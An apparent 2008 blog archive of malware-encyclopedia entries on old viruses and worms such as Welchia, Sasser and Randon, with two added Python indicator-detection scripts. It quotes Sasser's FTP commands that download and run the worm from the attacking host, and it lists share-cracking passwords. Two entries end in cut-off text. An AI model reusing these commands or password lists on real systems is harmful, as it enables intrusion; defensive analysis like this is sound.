Prevent Online Threats

Archive for August, 2008

WpcBai

Sunday, August 31st, 2008

Details
WpcBait

These are dangerous memory resident encrypted parasitic viruses. They hook INT 16h, 1Ch, 21h and write themselves to the end of COM and EXE files that are executed or closed. When an infected file is opened, the viruses disinfect it.
In some cases "WpcBait.3072" formats disk sectors. Depending on the system time and their counters, both viruses display the texts:
a l a - e h !
xxxxx x xxxxx xxxxx x x
|XxxxX|X |XxxxX xx |Xxxx |XxxxX
|X–+X|Xxxxx|X–+X |Xxxxx|X–+X
++ +++—-+++ ++ +—-+++ ++
—— A.R.Jr W P C B A T S ——-

Woytek.165

Sunday, August 31st, 2008

Details
Woytek.1656

It is not a dangerous memory resident parasitic polymorphic virus. It hooks INT 21h and writes itself to the end of EXE files that are accessed. The virus does not infect files that have the "Marek Sell" string near the header. If an error occurs while infecting a file, the virus creates the DIRINFO file in the current directory and writes one of the following strings to it:
Who is MR GUZEK ?
MR GUZEK was here
MR GUZEK is alive
MR GUZEK ForEver!
Immortal MR GUZEK

The virus also contains the text strings:
BioTech I, The Digital Form of Life
(c) by Woytek W. Lodz, 28 Nov 1996

Wormsign.171

Sunday, August 31st, 2008

Details
Wormsign.1710

It is a dangerous non-memory-resident encrypted parasitic virus. It searches for COM files and writes itself to their ends. Before infection the virus displays the string:
Wormsign !

It leaves behind a memory resident program that hooks INT 13h, 1Ch, 26h; when boot sectors are accessed, it clears the byte in the boot sector that holds the number of disk heads. Some DOS versions halt the PC when accessing such disks. Some time after that, the program displays the message:
W o r m s i g n !

The virus contains the additional text string:
*** THE SANDWORM ***

Worm.Win32.Zindos

Sunday, August 31st, 2008

Details
Worm.Win32.Zindos.a

This worm spreads via the Internet using machines infected by I-Worm.Mydoom.m and penetrates victim machines via the backdoor installed by Mydoom.m.
It is also programmed to conduct a DoS attack on www.microsoft.com.
The worm is approximately 5760 bytes in size and packed using UPX.
Installation
When launched, the worm copies itself under a random name to the system’s temporary directory. It registers this file in the system registry, thus ensuring the worm file will be launched each time Windows is started.
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"Tray" = worm file name
The worm randomly generates an IP address and will attempt to connect to this address via TCP port 1034 (the port opened by Mydoom.m). If a connection is established, the worm will send itself to the victim machine.
DoS attack
The worm sends multiple URLDownloadToCacheFile requests to the Microsoft corporate site.

Worm.Win32.Welchia

Sunday, August 31st, 2008

Details
Worm.Win32.Welchia.b
This worm spreads via the Internet using the DCOM RPC vulnerability in Microsoft Windows, which is described in Microsoft Security Bulletin MS03-026.
The worm also attempts to infect computers where Microsoft IIS 5.0 is installed, via the WebDAV vulnerability described in Microsoft Security Bulletin MS03-007.
The worm is written in Visual C++, and is approximately 12KB (12800 bytes) in size, compressed using UPX.
This version of Welchia attempts to find and delete the worms Mydoom.a and Mydoom.b from the computer.
Installation
On launching, the worm copies itself to the %System%\drivers directory under the name svchost.exe, and then creates a service named ‘WksPatch’. As a result, the worm will execute every time Windows is launched. The service display name is three words, randomly generated from the lists below:
First word:
System
Security
Remote
Routing
Performance
Network
License
Internet
Second word:
Logging
Manager
Procedure
Accounts
Event
Third word:
Provider
Sharing
Messaging
Client
For example, the display name of the service could be 'Remote Accounts Client' or 'System Logging Provider'.
The worm creates a unique identifier ‘WksPatch_Mutex’ to flag its presence in memory.
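The three word lists above give a closed set of 160 possible display names, which a defender can enumerate and match against. The following is an added example (not code from the original entry or from any vendor) that builds that set and flags service records matching the WksPatch name, a generated display name, or the svchost.exe path under %System%\drivers; it assumes service records are supplied as (name, display name, image path) tuples, and the sample records are constructed.

```python
import itertools

# Word lists copied from the Welchia.b description above; the service
# display name is one word from each list, in this order.
FIRST_WORDS = ["System", "Security", "Remote", "Routing",
               "Performance", "Network", "License", "Internet"]
SECOND_WORDS = ["Logging", "Manager", "Procedure", "Accounts", "Event"]
THIRD_WORDS = ["Provider", "Sharing", "Messaging", "Client"]

# Every display name Welchia.b can generate (8 * 5 * 4 = 160 combinations).
WELCHIA_DISPLAY_NAMES = frozenset(
    " ".join(words)
    for words in itertools.product(FIRST_WORDS, SECOND_WORDS, THIRD_WORDS)
)
WELCHIA_SERVICE_NAME = "WksPatch"


def welchia_indicators(service_name, display_name, image_path):
    """Return the Welchia.b traits a service record matches (empty if none)."""
    hits = []
    if service_name.lower() == WELCHIA_SERVICE_NAME.lower():
        hits.append("service name WksPatch")
    if display_name in WELCHIA_DISPLAY_NAMES:
        hits.append("display name built from Welchia.b word lists")
    # The worm drops svchost.exe under %System%\drivers; the genuine
    # svchost.exe lives directly in %System%, so the drivers path is a tell.
    if image_path.lower().replace("/", "\\").endswith("\\drivers\\svchost.exe"):
        hits.append("svchost.exe under %System%\\drivers")
    return hits


def scan_services(services):
    """services: iterable of (name, display_name, image_path) tuples.

    Returns {service_name: [traits]} for every service with at least one hit.
    """
    return {
        name: hits
        for name, display, path in services
        if (hits := welchia_indicators(name, display, path))
    }


# Constructed sample service list (not taken from a real machine). The
# "WINS Client" record mimics Welchia.a's service and is not matched here.
SAMPLE_SERVICES = [
    ("lanmanworkstation", "Workstation",
     r"C:\WINDOWS\system32\svchost.exe -k netsvcs"),
    ("WksPatch", "Remote Accounts Client",
     r"C:\WINDOWS\system32\drivers\svchost.exe"),
    ("WINS Client", "WINS Client", r"C:\WINDOWS\system32\Wins\dllhost.exe"),
]

if __name__ == "__main__":
    for name, hits in scan_services(SAMPLE_SERVICES).items():
        print(name, "->", "; ".join(hits))
```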
Deletion of Mydoom
The worm searches for files which could have been created by Mydoom.a and Mydoom.b and deletes them:
%System%\ctfmon.dll
%System%\Explorer.exe
%System%\shimgapi.dll
%System%\TaskMon.exe
Welchia.b also deletes the taskmon value from the system registry auto-run key and overwrites the hosts file with its own data (identical to the default Windows data).
Windows Patch Installation
The worm then scans the Windows system registry for installed patches and service packs. If the patch for the DCOM RPC vulnerability has not been installed, Welchia will download the patch from download.microsoft.com. Once the patch is successfully downloaded and installed, the worm re-boots the computer to complete installation.
Propagation
The worm creates two different requests to be sent to remote machines. The first request contains a WebDAV exploit, and the second contains a DCOM_RPC exploit which is almost identical to the one used in Lovesan.
Welchia.b selects an IP address, sends an ICMP request and waits for a response. If the remote computer responds, the worm connects to this computer via port 135 (as did Lovesan) or via port 80 (if the remote computer uses IIS). The worm then sends a packet which loads Welchia from the host machine.
Other
The worm searches directories of the corresponding IIS for files with the following extensions:
shtml
shtm
stm
cgi
php
html
htm
asp
If the infected machine's code page is Japanese, it overwrites these files with the following text:
LET HISTORY TELL FUTURE !

1931.9.18
1937.7.7
1937.12.13 300,000 !

1941.12.7
1945.8.6 Little boy
1945.8.9 Fatso

1945.8.15
Let history tell future !
The worm ceases to function on 1st June 2004.

Worm.Win32.Welchia

Sunday, August 31st, 2008

Details
Worm.Win32.Welchia.a
Welchia.a is an Internet Worm, which spreads through the Internet using the DCOM RPC vulnerability in Microsoft Windows described in Microsoft Security Bulletin MS03-026. The worm also breaches computers via the WebDav vulnerability in Microsoft IIS 5.0 described in Microsoft Security Bulletin MS03-007.
The worm is written in Visual C++ and is about 10 KB when compressed through UPX. It spreads as a pair of files named dllhost.exe and svchost.exe.
The worm contains the following text strings:
I love my wife & baby :-)
~~~ Welcome Chian~~~
Notice: 2004 will remove myself:-)
~~ sorry zhongli~~~

Installation
During installation the worm first copies itself to the %System%\Wins\ folder under the name dllhost.exe and creates a service named WINS Client. Then the worm copies the tftpd.exe file from the %System%\dllcache folder naming it svchost.exe and creating an additional service - Network Connections Sharing.
As a result, Welchia obtains control over the machine and executes itself every time the computer is rebooted.

Deletion of Lovesan
Welchia scans the system for the MSBLAST.EXE process, ends the process and deletes the MSBLAST.EXE file from the hard drive.

Windows Patch Installation
The worm then scans the Windows system registry for installed patches and service packs. If the patch for the DCOM RPC vulnerability has not been installed, Welchia will initiate the downloading process. Once the patch is successfully downloaded and installed, the worm re-boots the computer to complete installation.

Spreading
Welchia uses two methods to scan for IP addresses. In the first instance, the worm uses values A and B from the current address and scans the Internet for addresses beginning with A.B.0.0, working through all addresses where C and D are greater than zero.
In the second instance the worm chooses a random IP address.
The worm creates two different requests for sending to remote computers. The first request exploits the WebDAV vulnerability, the second request exploits the DCOM RPC vulnerability almost like Lovesan.
The worm finds an IP address, sends an ICMP request to it and waits for a response. If the remote machine responds, then the worm connects to it via port 135 (like Lovesan) or port 80 (if the machine uses IIS) and sends a ready-made package which loads Welchia from the host machine (via tftp).
The worm then scans the infected machine for the TFTPD.EXE file. If the TFTPD.EXE file does not exist, Welchia will download it (naming it svchost.exe) into the folder %System%\Wins\.

Other
Once the current year becomes 2004, Welchia ceases to function and deletes itself from the system.

Worm.Win32.VB.a

Saturday, August 30th, 2008

Details
Worm.Win32.VB.an
This worm spreads via file-sharing networks. The worm itself is a Windows PE EXE file approximately 770KB in size, written in MS Visual Basic. Installation Once launched, the worm causes the following window to be displayed: If the user clicks ‘Next’, the following fake error message will beall

Worm.Win32.Slute

Saturday, August 30th, 2008

Details
Worm.Win32.Sluter
Sluter is a worm virus that spreads over Win32 networks through shared resources.
The worm is a Windows PE EXE file about 18KB in length (when compressed by UPX, the decompressed size is about 45KB). It is written in Microsoft Visual C++.
When the infected file is run the worm registers itself in the system registry auto-run key:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
superslut = { worm file name }

Next, Sluter runs its spreading routines.
The spreading routine runs up to 60 threads which scan port 445 at random IP addresses. When it successfully connects to a victim machine, it tries to locate open resources on the remote computer and connects to them using several passwords such as:
"", "admin", "root", "123", etc.

If a successful connection is made the worm copies itself to the victim machine under the following names:
c$\winnt\system32\msslut32.exe
Admin$\system32\msslut32.exe

The worm then uses the WinNT remote management API to run an infected file on the remote machine.
The worm does not have any payload and does not manifest itself in any other way.

Worm.Win32.Slacko

Saturday, August 30th, 2008

Details
Worm.Win32.Slackor

This is a multi-component network worm. The worm spreads over shared network resources. The worm has bugs and has little chance of spreading over networks.
The worm’s components are:
cnn3.exe - the main component (Win32 EXE file about 350K of size)
abc.bat - BAT file (about 1344 bytes)
main.exe - trojan component (Win32 EXE file, 53280 bytes)
psexec.exe - remote execution utility (not a virus/trojan, Win32 EXE file, 122880 bytes)
slacke-worm.exe - searches for network addresses (Win32 EXE files, 25K/28K depending on worm version)

The main worm component is a trojan-dropping utility and is detected as "TrojanDropper.Win32.Yabinder".
On run it creates the "C:\sp" subdirectory, then drops and executes the following files there:
C:\sp\abc.bat
C:\sp\main.exe
C:\sp\psexec.exe
C:\sp\slacke-worm.exe

The “main.exe” component is the backdoor trojan, and it is detected as “Backdoor.SdBot”.
The "slacke-worm.exe" component looks for network resources and tries to copy the worm there and activate it with the help of two other components:
abc.bat - tries to connect to a remote resource by trying a set of logins and passwords
psexec.exe - is used to run remote worm copy on remote computer.

Worm.Win32.Sasser

Saturday, August 30th, 2008

Details
Worm.Win32.Sasser.b

Sasser.b is an Internet worm that uses the MS Windows LSASS vulnerability described in Microsoft Security Bulletin MS04-011.
Microsoft released a patch for this vulnerability on April 13, 2004, while Sasser.a was first detected on April 30, 2004.
Sasser.b operates in a very similar manner to Lovesan, except that Lovesan exploited a vulnerability in the RPC DCOM service, not the LSASS service.
Sasser affects computers running Windows 2000, Windows XP, Windows Server 2003. Sasser functions on all other versions of Windows but is unable to infect them by attacking via the vulnerability.
Sasser is written in C/C++, using the Visual C compiler. The worm is about 15 KB and is packed by PECompact2.
Signs of Infection
avserve.exe in the Windows directory.
An error message about the LSASS service failing which usually also causes the system to reboot.
Differences between Sasser.a and Sasser.b
Sasser.b uses a different file name for the main component that is registered in the system registry autorun key: avserve2.exe instead of avserve.exe.
The unique identifier name is changed to Jobaka3 and Sasser.b also attempts to create a second identifier named JumpallsNlsTillt.
The number of propagation routines is increased from 128 to 1024 and the name of the log file is changed to win2.log.

Worm.Win32.Sasser

Saturday, August 30th, 2008

Details
Worm.Win32.Sasser.a

Sasser is an Internet worm that exploits the MS Windows LSASS vulnerability described in Microsoft Security Bulletin MS04-011.
Microsoft released a patch for this vulnerability on April 13, 2004, while Sasser.a was first detected on April 30, 2004.
Sasser operates in a very similar manner to Lovesan, except that Lovesan exploited a vulnerability in the RPC DCOM service, not the LSASS service.
Sasser affects computers running Windows 2000, Windows XP, Windows Server 2003. Sasser functions on all other versions of Windows but is unable to infect them by attacking via the vulnerability.
Sasser is written in C/C++, using the Visual C compiler. The worm is about 15 KB and is packed by PECompact2.
Signs of Infection
The file 'avserve.exe' in the Windows directory.
An error message about the LSASS service failing which usually also causes the system to reboot.
Propagation
After launching, Sasser copies itself into the Windows root directory under the name avserve.exe and registers this file in the system registry autorun key:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"avserve.exe" = "%WINDIR%\avserve.exe"
Sasser creates a unique identifier 'Jobaka31' in RAM so that later infection attempts can detect a copy already running.
Sasser launches an FTP server on TCP port 5554 and then launches 128 propagation routines. During this process, the worm calls AbortSystemShutdown in an attempt to prevent the system from rebooting.
Sasser scans IP addresses to identify victims and sends a request to TCP port 445. If a machine responds, Sasser exploits the LSASS vulnerability to launch a 'cmd.exe' command shell on TCP port 9996. Finally, Sasser commands the infected machine to download and launch the main worm component under the name "N_up.exe", where "N" is a random number:
echo off
echo open [attacking machine address] 5554>>cmd.ftp
echo anonymous>>cmd.ftp
echo user
echo bin>>cmd.ftp
echo get [random number]_up.exe>>cmd.ftp
echo bye>>cmd.ftp
echo on
ftp -s:cmd.ftp
[random number]_up.exe
echo off
del cmd.ftp
echo on
As a result, one machine may be attacked more than once and contain multiple copies of the worm with sample names such as:
23101_up.exe
5409_up.exe
and so forth.
Other
After infection the victim machine generates an error message about a LSASS service failing, whereupon it may attempt to reboot.
Sasser creates the file ‘win.log’ in the C drive root directory where the worm records the IP-addresses of all attacked machines.

Worm.Win32.Rando

Saturday, August 30th, 2008

Details
Worm.Win32.Randon
Randon is a Virus-Worm distributed via IRC-channels and LANs with shared resources.
When executed, this worm installs its components into the subdirectory zxz and/or zx in the Windows system directory and registers its main file and the mIRC client in the Windows registry auto-run key (below):
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\updateWins
Randon then executes the above key and hides the process via the HideWindows utility. Randon connects to the IRC server and executes its scripts. In addition to DDoS attacks and IRC channel flooding, Randon scans port 445 of other IRC clients.
Distribution
Upon detection of an open port (445) the worm runs the batch files sencs.bat and incs.bat which try to locate open resources on the remote computer and connect to them using one of the following passwords:
"admin", "administrator", "root", "admin", "test", "test123", "temp",
"temp123", "pass", "password", "changeme"

If a connection is successful the worm opens a socket on port 445, transfers the trojan horse TrojanDownloader.Win32.Apher.gen and runs it. This trojan downloads a self-extracting archive of the worm's 'full' version from "www.q8kiss.net" and installs it in the system.
Additional information
The Randon worm consists of the following components:
Deta.exe - HideWindows utility (Win32 EXE file)
fControl.a - an IRC script (port scanning and infecting remote computers)
IfCOntrol.a - an IRC script (IRC channel flooding and DDoS attacks (pinging different addresses))
incs.bat - BATCH file (LAN resource password cracker)
Libparse.exe - "PrcView" utility (Win32 EXE file)
psexec.exe - "PsExec" utility (Win32 EXE file)
rcfg.ini - IRC INI file (loads other scripts)
rconnect.conf - configuration file
reader.w - list of nicknames used by the worm to establish connections with IRC channels
Sa.exe - TrojanDownloader.Win32.Apher
scontrol.a - helper IRC script
sencs.bat - BAT file (transferred to the remote computer to execute the TrojanDownloader)
systrey.exe - renamed mIRC client (Win32 EXE file)
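Several entries on this page (Zindos.a, Sluter, Sasser.a and Sasser.b, Randon) name the exact value the worm writes under HKLM\...\CurrentVersion\Run, and Sasser additionally leaves N_up.exe copies and a win.log/win2.log file in the C: root. The following is an added example (not code from the original entries or from any vendor) that matches a dump of Run-key values and a file listing against those indicators; it assumes the Run entries are supplied as (value name, image path) pairs, and all sample data is constructed.

```python
import re

# Run-key value names and dropped-file names as given in the worm
# descriptions on this page. Each rule gets (value_name, image_path)
# from an HKLM\...\CurrentVersion\Run entry and returns True on a match.
RUN_KEY_RULES = [
    # Zindos.a: value "Tray" pointing at a random-named file in the temp dir.
    ("Worm.Win32.Zindos.a",
     lambda name, path: name.lower() == "tray" and "\\temp\\" in path.lower()),
    # Sluter: value "superslut"; the dropped copy is msslut32.exe.
    ("Worm.Win32.Sluter",
     lambda name, path: name.lower() == "superslut"
     or path.lower().endswith("\\msslut32.exe")),
    # Sasser.a registers avserve.exe, Sasser.b avserve2.exe, from %WINDIR%.
    ("Worm.Win32.Sasser.a",
     lambda name, path: path.lower().endswith("\\avserve.exe")),
    ("Worm.Win32.Sasser.b",
     lambda name, path: path.lower().endswith("\\avserve2.exe")),
    # Randon: value "updateWins" under the Run key.
    ("Worm.Win32.Randon",
     lambda name, path: name.lower() == "updatewins"),
]

# Sasser pulls its copy over as "<random number>_up.exe" and logs attacked
# addresses to win.log (Sasser.a) or win2.log (Sasser.b) in the C: root.
UP_EXE = re.compile(r"^\d+_up\.exe$", re.IGNORECASE)
SASSER_LOGS = {r"c:\win.log", r"c:\win2.log"}


def match_run_entries(entries):
    """entries: iterable of (value_name, image_path). Returns {value_name: [labels]}."""
    hits = {}
    for value_name, image_path in entries:
        labels = [label for label, rule in RUN_KEY_RULES if rule(value_name, image_path)]
        if labels:
            hits[value_name] = labels
    return hits


def sasser_file_indicators(paths):
    """Return the paths that look like Sasser's N_up.exe copies or its log file."""
    found = []
    for path in paths:
        basename = path.rsplit("\\", 1)[-1]
        if UP_EXE.match(basename) or path.lower() in SASSER_LOGS:
            found.append(path)
    return found


# Constructed sample data, not from a real host.
SAMPLE_RUN_ENTRIES = [
    ("ctfmon.exe", r"C:\WINDOWS\system32\ctfmon.exe"),
    ("Tray", r"C:\WINDOWS\Temp\qjxw.exe"),
    ("superslut", r"C:\WINNT\system32\msslut32.exe"),
    ("avserve.exe", r"C:\WINDOWS\avserve.exe"),
    ("updateWins", r"C:\WINDOWS\system32\zxz\systrey.exe"),
]
SAMPLE_FILES = [r"C:\win.log", r"C:\WINDOWS\23101_up.exe", r"C:\WINDOWS\notepad.exe"]

if __name__ == "__main__":
    print(match_run_entries(SAMPLE_RUN_ENTRIES))
    print(sasser_file_indicators(SAMPLE_FILES))
```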

Worm.Win32.Randex

Friday, August 29th, 2008

Details
Worm.Win32.Randex.a
“Randex” is a group of worms that spread over Win32 networks (local and global) through shared resources.
The worms are Windows PE EXE files that appear under several names (see the name list below). Randex worms are written in Microsoft Visual C++.
A Randex worm enters a computer and goes into a Windows folder where it registers itself in the system registry autorun key:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run

It then runs its spreading routine.
The routine entails scanning port 445 at random IP addresses, and when successfully connecting to a victim machine the worm tries to locate open resources on the remote computer and connect to them using various passwords such as:
"", "admin", "root", "123", etc.
When a successful connection is accomplished the worm copies itself to a victim machine under the following names:
Randex.a - hxedofos.exe
Randex.b - ns32.exe
Randex.c - msmsgr.exe
Randex.d - msmsgri32.exe
The Randex worm then uses the WinNT remote administration service to run itself on a remote machine.
Randex worms are very similar to other network worms such as: Worm.Win32.Slackor and Worm.Win32.Sluter.

Worm.Win32.Raleka

Friday, August 29th, 2008

Details
Worm.Win32.Raleka.a
Raleka is a worm-virus that spreads through the Internet by exploiting a vulnerability in the DCOM RPC service in Microsoft Windows. This vulnerability is detailed in Microsoft Security Bulletin MS03-026.
The infected file is approx. 14KB in size when packed by UPX.
Installing
When run, the worm downloads and launches the Trojan called 'Backdoor.RtKit' (which contains the files ntrootkit.exe and ntrootkit.reg). Raleka then starts its spreading procedure.
Replication
The worm sequentially scans IP addresses beginning from A.B.C.0, where 'A' and 'B' are taken from the address of the current victim computer and 'C' is selected at random.
The worm connects to IP addresses via a TCP connection to port 135 and sends out a specially formulated packet. This packet contains code that allows the worm to remotely run arbitrary commands on infected machines. If an attacked computer is vulnerable to the DCOM RPC exploit the code is automatically run.
If an attack is successful, a program file called 'down.com' is created and run on the victim machine. This program loads the files 'svchost32.exe' (the worm file), 'service.exe' (an auxiliary file that loads services) and 'ntrootkit.exe' (Backdoor.RtKit).
Svchost32.exe is copied to a Windows subdirectory under the name 'svchost.exe'. Additionally, a command file is created in the Windows directory that executes the svchost.exe program file. With the help of the program file 'service.exe', this command file is set for automatic execution upon the next operating system restart.
Other
The Raleka worm launches an HTTP server on infected computers that it uses to serve the worm files 'service.exe' and 'ntrootkit.exe' (see "Replication" above). The worm then connects to the IRC server 'ircircsoulz.net', from which it can receive and execute commands such as:
Connect to an IRC channel as indicated in the command
Upload processes from memory
Download files from the Internet
Launch files
Install the patch curing the DCOM vulnerability (it loads the patch version intended for the Spanish version of Windows XP)
Download new worm versions from indicated sites
Send out a list of IP addresses identified in scans as being open to the DCOM RPC vulnerability (see “Replication” above)

Worm.Win32.Rahak

Friday, August 29th, 2008

Details
Worm.Win32.Rahak.b
This network worms spreads via network resources with poor password protection. The worm infects computers connected to the Internet, running Windows, which have Remote Administrator installed and weak password protection. The worm itself is a Windows PE EXE file, approximately 69KB in size,all

